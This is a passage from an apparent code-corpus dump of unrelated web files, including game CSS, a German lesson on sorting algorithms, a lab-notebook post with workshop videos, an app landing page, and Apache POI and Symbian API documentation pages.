0 #19a04f; -webkit-transition: all 0.1s ease; -moz-transition: all 0.1s ease; -o-transition: all 0.1s ease; transition: all 0.1s ease; -webkit-box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; -moz-box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; box-shadow: rgba(255, 255, 255, 0.5) 0 1px 0 0 inset, rgba(255, 255, 255, 0.35) 0px 0px 5px inset, rgba(0, 0, 0, 0.15) 0px 2px 2px; outline: 0; margin-left: auto; margin-right: auto; margin-top: 20px; width: 400px; height: 300px; z-index: 11; overflow: scroll; } /* line 950, ../sass/screen.scss */ #stage .credits_scene .credits.removal { -webkit-animation-delay: 0.2s; -moz-animation-delay: 0.2s; -ms-animation-delay: 0.2s; -o-animation-delay: 0.2s; animation-delay: 0.2s; } /* line 954, ../sass/screen.scss */ #stage .credits_scene .credits h2 { font-size: 35px; padding-top: 30px; } /* line 959, ../sass/screen.scss */ #stage .credits_scene .credits .parse { font-family: "Raleway", sans-serif; font-weight: 100; font-size: 100px; line-height: 100px; } /* line 966, ../sass/screen.scss */ #stage .credits_scene .credits .tutorial { margin-top: 30px; } /* line 969, ../sass/screen.scss */ #stage .credits_scene .credits .tutorial .icon { background: url(/assets/apple-touch-icon-144x144-precomposed.png) no-repeat; background-size: contain; width: 80px; height: 80px; float: left; margin-left: 80px; } /* line 978, ../sass/screen.scss */ #stage .credits_scene .credits .tutorial a { font-size: 15px; font-weight: 200; padding-left: 140px; padding-right: 70px; padding-top: 6px; display: block; text-decoration: none; color: #AEE9FF; cursor: pointer; } /* line 989, ../sass/screen.scss */ #stage .credits_scene .credits .tutorial a:hover { text-decoration: underline; } /* line 995, ../sass/screen.scss */ #stage .credits_scene .credits.small { width: 240px; } /* line 998, ../sass/screen.scss */ #stage .credits_scene .credits.small h2 { font-size: 28px; } /* line 1002, ../sass/screen.scss */ #stage .credits_scene .credits.small p.parse { font-size: 85px; } /* line 1007, ../sass/screen.scss */ #stage .credits_scene .credits.small .tutorial .icon { margin: 0px; } /* line 1011, ../sass/screen.scss */ #stage .credits_scene .credits.small .tutorial a { padding: 0px; } /* line 1018, ../sass/screen.scss */ #stage .credits_scene .back_button { -webkit-animation: dropMenu 0.2s 1s ease 1 normal both; -moz-animation: dropMenu 0.2s 1s ease 1 normal both; -ms-animation: dropMenu 0.2s 1s ease 1 normal both; animation: dropMenu 0.2s 1s ease 1 normal both; margin-top: 10px; } /* line 1022, ../sass/screen.scss */ #stage .credits_scene .back_button.removal { -webkit-animation-delay: 0s; -moz-animation-delay: 0s; -ms-animation-delay: 0s; -o-animation-delay: 0s; animation-delay: 0s; } /* line 1029, ../sass/screen.scss */ .disabled { pointer-events: none; } @media all and (max-width: 600px) { /* line 1035, ../sass/screen.scss */ #stage .menu_scene { margin-top: -10px; } /* line 1037, ../sass/screen.scss */ #stage .menu_scene .title { height: 120px; } /* line 1040, ../sass/screen.scss */ #stage .menu_scene .menu_item { margin-top: 20px; } /* line 1043, ../sass/screen.scss */ #stage .menu_scene .menu_item:first { margin-top: 0; } /* line 1047, ../sass/screen.scss */ #stage .cloud { width: 120px; } /* line 1051, ../sass/screen.scss */ #stage .game_scene #hud { top: 10px; left: 10px; } /* line 1054, ../sass/screen.scss */ #stage .game_scene #hud p.small { font-size: 11px; height: 0px; } /* line 1058, ../sass/screen.scss */ #stage .game_scene #hud p.small span { font-size: 11px; } /* line 1063, ../sass/screen.scss */ #stage .game_scene .back_button { width: 27px; height: 27px; padding: 0px; font-size: 11px; top: 10px; right: 10px; } }
inf-schule Knoten/algorithmen/entwurf/analyse/inhalt.html
themetalone/sortieren-mit-kisten
<div class="sect1"> <h2 id="_vereinfachen_des_problems">Vereinfachen des Problems</h2> <div class="sectionbody"> <div class="paragraph"> <p>Im Folgenden soll ein Sortieralgorithmus entwickelt werden. Um uns auf das Problem des Sortieren zu konzentrieren werden in diesem Kapitel nur <em>einfache</em> Objekte behandelt. Ein solches <em>einfaches</em> oder auch <em>triviales</em> Objekt besteht nur aus einem Eigenschaftswert. Und um es noch einfacher zu machen, sind alle Eigenschaftswerte positive ganze Zahlen.</p> </div> <div class="exampleblock"> <div class="content"> <div class="olist arabic"> <ol class="arabic"> <li> <p>Begründe, wieso es genügt, das Sortierproblem für diese reduzierten Objekte zu lösen.</p> </li> </ol> </div> </div> </div> </div> </div> <div class="sect1"> <h2 id="_das_sortieren">Das Sortieren</h2> <div class="sectionbody"> <div class="paragraph"> <p>Du sollst im Folgenden eine Liste vereinfachter Objekte sortieren. Damit später auch der Computer dein Verfahren anwenden kann, beschränken wir uns bei den Vergleichen auf die bekannten Ergebnisse <em>größer, kleiner, gleich</em>.</p> </div> <div class="exampleblock"> <div class="content"> <div class="olist arabic"> <ol class="arabic"> <li> <p>Öffne <a href="https://themetalone.github.io/sortieren-mit-kisten">die Online-Waage</a> in einem zusätzlichen Fenster und klicke auf <em>Standardaufgabe</em></p> </li> <li> <p>Sortiere die Liste. Versuche deine Lösungsansätze schriftlich festzuhalten. Du kannst auch Hilfslisten dazu verwenden. Ziel ist es, das am Ende eine Listen vollständig und sortiert ist.</p> </li> <li> <p>Um aus deinem Lösungsansatz einen funktionierenden Algorithmus zu machen, soll dieser nun weiterentwickelt werden. Wähle dazu einen der folgenden Ansätze (am Besten einen, den du bereits in der vorherigen Aufgabe versucht hast)</p> <div class="olist loweralpha"> <ol class="loweralpha" type="a"> <li> <p>Sortieren durch Auswählen des aktuell größten oder kleinsten Objektes in der Liste</p> </li> <li> <p>Sortieren durch Einfügen von Objekten in bereits sortierte Listen</p> </li> <li> <p>Sortieren durch Vertauschen von benachtbarten Objekten</p> </li> </ol> </div> </li> <li> <p>Wende nun den von dir entworfenen Sortieralgorithmus auf ein neues Problem an. Wähle dazu in der Online-Waage <em>Neues Problem</em>. Wenn du daneben <em>Schwer</em> auswählst, erhälst du eine größere Liste zum Sortieren.</p> </li> </ol> </div> </div> </div> </div> </div>
web/css/loadingpage.css
iCONEXT/SMI_Travel
/* To change this license header, choose License Headers in Project Properties. To change this template file, choose Tools | Templates and open the template in the editor. */ /* Created on : Oct 19, 2015, 11:51:46 AM Author : Kanokporn */ #loading { width: 100%; height: 100%; top: 0px; left: 0px; position: fixed; display: block; opacity: 0.7; background-color: #BDBDBD; z-index: 99; text-align: center; } #loading-image { position: absolute; top: 45%; left: 45%; width:160px; height: 24px; z-index: 50; } #loading-background{ position: absolute; top: 0; left: 0; width: 100%; height: 100%; z-index: 10; background-color: rgba(0,0,0,0.1); /*dim the background*/ }
2011/03/24/data-management-workshop-at-uc-davis-center-for-population-biology-video-archive.html
sunbjt/cboettig.github.com
<!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head prefix="dc: http://purl.org/dc/terms/ og: http://ogp.me/ns#"> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'/> <title>Data Management Workshop at UC Davis Center for Population Biology: Video archive</title> <meta name="author" content="Carl Boettiger" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <!-- Get date last modified from git log. (Uses current time if file entry not found, e.g. projects/) --> <!-- For posts, page.date is the date they are published under, which we use as their 'canonical' dc:date --> <!-- Posts declare modified timestamps in the sidebar, so would be redundant to put here. But then pages don't have a dc:modified... unless we give them their own (modified) sidebar? --> <!-- Ideally we would want date originally created from the _oldest_ git commit too...--> <!-- HTML5 metadata --> <meta name="keywords" content="" /> <meta name="description" content="" /> <meta name="resource_type" content="website"/> <!-- RDFa Metadata (in DublinCore) --> <meta property="dc:title" content="Data Management Workshop at UC Davis Center for Population Biology: Video archive" /> <meta property="dc:creator" content="Carl Boettiger" /> <meta property="dc:date" content="2011-03-24T16:30:24Z" /> <meta property="dc:format" content="text/html" /> <meta property="dc:language" content="en" /> <meta property="dc:identifier" content="/2011/03/24/data-management-workshop-at-uc-davis-center-for-population-biology-video-archive.html" /> <meta property="dc:rights" content="CC0" /> <meta property="dc:source" content="Lab Notebook" /> <meta property="dc:subject" content="Ecology" /> <meta property="dc:type" content="website" /> <!-- RDFa Metadata (in OpenGraph) --> <meta property="og:title" content="Data Management Workshop at UC Davis Center for Population Biology: Video archive" /> <meta property="og:author" content="http://carlboettiger.info/index.html#me" /> <!-- Should be Liquid? URI? --> <meta property="http://ogp.me/ns/profile#first_name" content="Carl"/> <meta property="http://ogp.me/ns/profile#last_name" content="Boettiger"/> <meta property="http://ogp.me/ns/article#published_time" content="2011-03-24T16:30:24Z" /> <meta property="og:site_name" content="Lab Notebook" /> <!-- Same as dc:source? --> <meta property="og:url" content="http://carlboettiger.info/2011/03/24/data-management-workshop-at-uc-davis-center-for-population-biology-video-archive.html" /> <meta property="og:type" content="website" /> <!-- Google Scholar Metadata --> <meta name="citation_author" content="Carl Boettiger"/> <meta name="citation_date" content="2011-03-24T16:30:24Z"/> <meta name="citation_title" content="Data Management Workshop at UC Davis Center for Population Biology: Video archive"/> <meta name="citation_journal_title" content="Lab Notebook"/> <!--NOTE: see also the COinS Metadata in span element in footer --> <!-- CSS Stylesheets (toggled with javascript) --> <link href="/assets/css/bootstrap.css" rel="stylesheet" type="text/css" title="white" /> <link href="/assets/css/light.css" rel="alternate stylesheet" type="text/css" id="stl" title="light" /> <link href="/assets/css/dark.css" rel="alternate stylesheet" type="text/css" title="dark" /> <link href="/assets/css/bootstrap-responsive.css" rel="stylesheet" type="text/css"/> <!-- Javascript needed for theme toggle, load immediately --> <script type="text/javascript" src="/assets/js/switch-css.js"></script> <script type="text/javascript"> set_style_from_cookie(); </script> </head> <body prefix="dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/"> <!-- Navbar ================================================== --> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container"> <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </a> <a class="brand" href="/README.html"><i style="float:right;" class="icon-info-sign" alt="info"></i></span></a> <div class="nav-collapse"> <ul class="nav"> <li> <a href="/index.html">Home</a></li> <li> <a href="/vita.html">Vita</a></li> <li> <a href="/research.html">Research</a></li> <li> <a href="/teaching.html">Teaching</a></li> <li> <a href="/community.html">Community</a></li> <li> <a href="/lab-notebook.html">Lab Notebook</a></li> </ul> </div><!--/.nav-collapse --> <!-- Search site using Google's index --> <form class="navbar-search pull-right" method="get" action="http://google.com/search"> <p> <input type="hidden" name="q" value="site:carlboettiger.info" /> <input type="text" class="search-query" name="q" /> <button class="btn btn-mini" type="submit"><i class="icon-search"></i></button> </p> </form> <!-- <div id="search"> <form method="get" class="navbar-search pull-right form-search"> <p> <input type="text" name="search-text" id="search-text"> <button class="btn btn-mini" type="submit"><i class="icon-search"></i></button> </p>    </form> </div> --> </div> <!-- /container --> </div> <!-- /navbar-inner --> </div> <!-- /navbar --> <div class="container"> <!-- Responsive grid layout --> <header class="jumbotron"> <h1 class="entry-title">Data Management Workshop at UC Davis Center for Population Biology: Video archive</h1> <h3></h3> </header> <div class="row"> <div class="span7 offset1"> <article> <p>Videos are now up from our workshop, The Future of Data, held at the UC Davis Center for Population Biology March 2nd-4th.</p> <h3 id="panel">Panel</h3> <ul> <li><p><a href="http://strong.ucdavis.edu/">Don Strong</a>, Editor-in-Chief of <strong>Ecology</strong></p></li> <li><p><a href="http://www.des.ucdavis.edu/faculty/holyoak/">Marcel Holyoak</a>, Editor-in-Chief, <strong>Ecology Letters</strong></p></li> <li><p><a href="http://phylogenomics.blogspot.com/">Jonathan Eisen,</a> Editor-in-Chief, <strong>PLoS Biology</strong></p></li> <li><p><a href="http://two.ucdavis.edu/%7Eme/">Alan Hastings</a>, founding Editor-in-Chief, <strong>Theoretical Ecology</strong></p></li> <li><p><a href="http://www.des.ucdavis.edu/FacultyInfo.aspx?ID_Number=83">Robert Hijmans</a>, Asst Professor of Environmental Science &amp; Policy</p></li> <li><p><a href="http://www.cdlib.org/cdlinfo/2010/05/19/patricia-cruse-digital-preservation-pioneer/">Trisha Cruse</a> (Director), with Associate Directors Stephen Abrams  &amp; John Kunze from <a href="http://www.cdlib.org/services/uc3/index.html">UC Curation Center</a>.</p></li> </ul> <h2 id="session-i-why-archive">Session I: Why Archive?</h2> <p>[iframe http://player.vimeo.com/video/21351995 400 300]</p> <h2 id="session-ii-leveraging-data-archives">Session II: Leveraging Data Archives</h2> <p>[iframe http://player.vimeo.com/video/21354540 400 300]</p> <h2 id="session-iii-looking-ahead">Session III: Looking ahead</h2> <p>[iframe http://player.vimeo.com/video/21354825 400 300]</p> <p>More information about the workshop and further references on data management <a href="http://www.carlboettiger.info/archives/905">here</a>.</p> </article> </div> <div class="span4"> <div class="sidebar"> <aside prefix="og:http://ogp.me/ns/article#"> <p> <i class="icon-calendar"></i> <time datetime="2011-03-24T16:30:24Z" property="dc:created">24 Mar 2011</time></p> <p><small> modified: <time datetime="2013-02-19T10:27:50-08:00" property="dc:modified">19 Feb 2013</time></small></p> <br /> <p><a class="btn btn-mini" rel="prev" href='/2011/03/23/wednesday-2.html'><i class="icon-chevron-left"></i> prev</a> <a class="btn btn-mini" rel="next" href='/2011/03/24/thursday-3.html'>next <i class="icon-chevron-right"></i></a></p> <br /> <p> <a onclick="recordOutboundLink(this, 'Outbound Links', 'history'); return false;" class="btn btn-mini" href="https://github.com/cboettig/labnotebook/commits/master/_posts/2011-03-24-data-management-workshop-at-uc-davis-center-for-population-biology-video-archive.md"><i class="icon-time"></i> history</a></p> <br /> <p><i class="icon-list"></i> Posted in <a rel="dc:subject" class="category" href="/categories.html#open-science">open-science</a> </p> <p> <i class="icon-tag"></i> tags: </p> <br/> <p style="font-style:italic"> <i class="icon-signal"></i> pageviews: 2</p> <br/> <p><small> <i class="icon-barcode"></i> SHA Hash: <a href="https://github.com/cboettig/labnotebook/commit/60fee991d34c96a1f8d91d4dbbe0efe63c4daef7/_posts/2011-03-24-data-management-workshop-at-uc-davis-center-for-population-biology-video-archive.md"> 60fee991d34c96a1f8d91d4dbbe0efe63c4daef7</a></small></p> <br/> </aside> </div> </div> </div> <!-- Disqus Comments --> <div class="row disqus"> <div class="span8"> <div id="disqus_thread"></div> <script type="text/javascript"> var disqus_shortname = 'cboettig'; // required: replace example with your forum shortname /* * * DON'T EDIT BELOW THIS LINE * * */ (function() { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })(); </script> <noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript> </div> </div> <footer class="footer"> <!-- ************* Buttons to toggle theme CSS ********************** --> <div class="row"> <div class="span12"> <form style="font-size:10px" class="pull-right"> <a onclick="switch_style('dark'); recordOutboundLink(this, 'Outbound Links', 'dark theme'); return false;" name="theme" value="dark" id="dark" class="btn btn-mini"><span class="showtooltip" title="switch to dark theme"><i class="icon-adjust"></i> </span></a> <a onclick="switch_style('light'); recordOutboundLink(this, 'Outbound Links', 'light theme'); return false;" name="theme" value="light" id="light" class="btn btn-mini"><span class="showtooltip" title="switch to light theme"><i class="icon-certificate"></i> <a onclick="switch_style('white'); recordOutboundLink(this, 'Outbound Links', 'white theme'); return false;" name="theme" value="white" id="white" class="btn btn-mini"><span class="showtooltip" title="switch to white theme"><i class="icon-circle-blank"></i> </span></a> </span></a> </form> </div> </div> <!--************** FOAF information to social networks ***************************** --> <div class="row"> <div class="span3 socialicons" style="font-size:20px" typeof="foaf:Person" about="http://carlboettiger.info#me"> <p> <script type="text/javascript" src="/assets/js/obfuscate-email-link.js" language="javascript"></script> <a rel="foaf:account" alt="twitter" href="https://twitter.com/cboettig" onclick="recordOutboundLink(this, 'Outbound Links', 'Twitter'); return false;"><span class="showtooltip" title="follow me on twitter (reading, discussing)"><i class="icon-twitter"></i></span></a> <a rel="foaf:account" alt="github" href="https://github.com/cboettig" onclick="recordOutboundLink(this, 'Outbound Links', 'Github'); return false;"><span class="showtooltip" title="follow me on Github (code, research)"><i class="icon-github"></i></span></a> <!-- <a rel="foaf:account" href="https://plus.google.com/" onclick="recordOutboundLink(this, 'Outbound Links', 'GPlus'); return false;"><i class="icon-google-plus"></i></a> <a rel="foaf:account" href="http://www.mendeley.com/profiles/carl-boettiger" onclick="recordOutboundLink(this, 'Outbound Links', 'Mendeley'); return false;"><img src="/assets/img/icon-mendeley.png" alt="mendeley" /></a> citations on google-scholar stackoverflow --> <a alt="rss" type="application/atom+xml" href="/atom.xml" class="showtooltip" title="subscribe to RSS feeds for my open lab notebook" onclick="recordOutboundLink(this, 'Outbound Links', 'RSS'); return false;"><i class="icon-rss"></i></a> </p> </div> <!--**************** End social links **************************** --> <div class="span1"> <br /> </div> <div class="span4"> <p> <a onclick="recordOutboundLink(this, 'Outbound Links', 'ONS_claim'); return false;" href="http://onsclaims.wikispaces.com/"><img src="http://onsclaims.wikispaces.com/file/view/ons-aci2-icon.png" alt="ONS" class="showtooltip" title="An Open Notebook Science (ONS) project claim: Entry provides all content (AC) immediately (I) or without significant delay. See link for details"/></a> <a title="This site uses linked data semantics. Click to extract as RDF XML." class="btn btn-mini showtooltip" style="font-size: .8em" href="http://any23.org/?format=rdfxml&validate=validate&uri=http://carlboettiger.info/2011/03/24/data-management-workshop-at-uc-davis-center-for-population-biology-video-archive.html"><i class="icon-cloud-download" onclick="recordOutboundLink(this, 'Outbound Links', 'RDF'); return false;"></i> RDF</a> </p> </div> <div class="span1"> <br /> </div> <div class="span3"> <p> <a rel="license" property="http://creativecommons.org/ns#license" href="http://creativecommons.org/publicdomain/zero/1.0/" onclick="recordOutboundLink(this, 'Outbound Links', 'CC0'); return false;"><img src="http://i.creativecommons.org/l/zero/1.0/88x31.png" alt="CC0"/></a> </p> </div> </div> <!-- COinS metadata (for citation managers like Zotero etc), goes in body text --> <span class="Z3988" title="ctx_ver=Z39.88-2004 &amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Adc &amp;rfr_id=info%3Asid%2Focoins.info%3Agenerator &amp;rft.title=Data Management Workshop at UC Davis Center for Population Biology: Video archive &amp;rft.creator=Carl Boettiger &amp;rft.date=2011-03-24 &amp;rft.language=EN &amp;rft.rights=CC0 &amp;rft_id=http://carlboettiger.info/2011/03/24/data-management-workshop-at-uc-davis-center-for-population-biology-video-archive.html"> </span> </footer> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <!-- JQuery, used on a few pages --> <script type="text/javascript" src="/assets/js/jquery.js"></script> <!-- Equations using MathJax --> <script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script> <script type="text/x-mathjax-config"> MathJax.Hub.Config({ TeX: { equationNumbers: {autoNumber: "all"} } }); </script> <!-- Twitter Bootstrap Javascript --> <script src="/assets/js/bootstrap.min.js"></script> <!-- Tooltip javascript --> <script type="text/javascript"> $(document).ready(function (){ $(".showtooltip").tooltip(); }); </script> <!-- Marran's Search Javascript --> <script type="text/javascript" src="/assets/js/porter-stemmer.js"></script> <script type="text/javascript" src="/assets/js/site-search.js"></script> <!-- Code collapse Javascript --> <script type="text/javascript"> $(document).ready(function(){ $("#toggle_code").click(function(){ $(".highlight").toggle(); $(".sourceCode").toggle(); }); }); </script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-18401403-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <script type="text/javascript"> function recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-18401403-1"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){} } </script> </div> </body> </html>
docs/index.html
nathanwentworth/moodbored
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="description" content=""> <title>title</title> <!-- <link rel="apple-touch-icon" href=""> --> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/assets/css/main.css"> </head> <body> <div class="main-container"> <header class="main-header"> <h1 class="site-title"><img alt="moodbored" src="/assets/img/moodbored-icon.png"></h1> <a class="cta header-cta" href="https://github.com/nathanwentworth/moodbored/releases/latest" id="fixed-cta">download</a> </header> <img class="header-screenshot" src="/assets/img/moodbored-00001.png"> <main> <section> <div class="section-text-container"> <h1>This is moodbored</h1> <p>Organize and display all of your inspiration. Keep your moodboards, projects, and visual identities all within reach. Store your moodbored folder in Dropbox or Google Drive to keep your whole team in sync. Free, open-source, and cross-platform.</p> </div> <div class="section-image-container"> <img src="/assets/img/moodbored-00001.png"> </div> </section> <section> <div class="section-text-container"> <h1>Lightbox</h1> <p>View your images in a full-window lightbox, use your arrow keys to navigate through each folder like a slideshow.</p> </div> <div class="section-image-container"> <img src="/assets/img/moodbored-00002.png"> </div> </section> <section> <div class="section-text-container"> <h1>Customizable</h1> <ul> <li>Drag and drop file adding</li> <li>Custom background color</li> <li>Custom column count and gutter width</li> <li>Full css editing</li> </ul> </div> <div class="section-image-container"> <img src="/assets/img/moodbored-00003.png"> </div> </section> </main> <footer> <div> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p> </div> </footer> </div> <script type="text/javascript" src="/assets/js/main.js"></script> </body> </html>
Desktop/tool/poi-bin-3.15-20160924/poi-3.15/docs/apidocs/org/apache/poi/hmef/package-use.html
tommylsh/test20170719
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <title>Uses of Package org.apache.poi.hmef (POI API Documentation)</title> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Package org.apache.poi.hmef (POI API Documentation)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li class="navBarCell1Rev">Use</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/apache/poi/hmef/package-use.html" target="_top">Frames</a></li> <li><a href="package-use.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 title="Uses of Package org.apache.poi.hmef" class="title">Uses of Package<br>org.apache.poi.hmef</h1> </div> <div class="contentContainer"> <ul class="blockList"> <li class="blockList"> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation"> <caption><span>Packages that use <a href="../../../../org/apache/poi/hmef/package-summary.html">org.apache.poi.hmef</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Package</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="#org.apache.poi.hmef">org.apache.poi.hmef</a></td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="#org.apache.poi.hmef.extractor">org.apache.poi.hmef.extractor</a></td> <td class="colLast">&nbsp;</td> </tr> </tbody> </table> </li> <li class="blockList"><a name="org.apache.poi.hmef"> <!-- --> </a> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing classes, and an explanation"> <caption><span>Classes in <a href="../../../../org/apache/poi/hmef/package-summary.html">org.apache.poi.hmef</a> used by <a href="../../../../org/apache/poi/hmef/package-summary.html">org.apache.poi.hmef</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Class and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colOne"><a href="../../../../org/apache/poi/hmef/class-use/Attachment.html#org.apache.poi.hmef">Attachment</a> <div class="block">An attachment within a <a href="../../../../org/apache/poi/hmef/HMEFMessage.html" title="class in org.apache.poi.hmef"><code>HMEFMessage</code></a>.</div> </td> </tr> </tbody> </table> </li> <li class="blockList"><a name="org.apache.poi.hmef.extractor"> <!-- --> </a> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing classes, and an explanation"> <caption><span>Classes in <a href="../../../../org/apache/poi/hmef/package-summary.html">org.apache.poi.hmef</a> used by <a href="../../../../org/apache/poi/hmef/extractor/package-summary.html">org.apache.poi.hmef.extractor</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Class and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colOne"><a href="../../../../org/apache/poi/hmef/class-use/HMEFMessage.html#org.apache.poi.hmef.extractor">HMEFMessage</a> <div class="block">HMEF - Implementation of the Microsoft TNEF message encoding format (aka winmail.dat) See: http://support.microsoft.com/kb/241538 http://en.wikipedia.org/wiki/Transport_Neutral_Encapsulation_Format http://search.cpan.org/dist/Convert-TNEF/</div> </td> </tr> </tbody> </table> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li class="navBarCell1Rev">Use</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/apache/poi/hmef/package-use.html" target="_top">Frames</a></li> <li><a href="package-use.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small> <i>Copyright 2016 The Apache Software Foundation or its licensors, as applicable.</i> </small></p> </body> </html>
sdk/GUID-11CB58C4-19D5-33C1-9797-0B591F740065.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="cxxStruct" /> <meta name="DC.Title" content="ESock::TUPSStatusChangeParams" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-11CB58C4-19D5-33C1-9797-0B591F740065" /> <title> ESock::TUPSStatusChangeParams </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api" /> <link rel="stylesheet" type="text/css" href="cxxref.css" /> </head> <body class="cxxref" id="GUID-11CB58C4-19D5-33C1-9797-0B591F740065"> <a name="GUID-11CB58C4-19D5-33C1-9797-0B591F740065"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2518338 id2518347 id2858858 id2471677 id2704530 id2704535 "; YAHOO.util.Event.onDOMReady(buildTree, 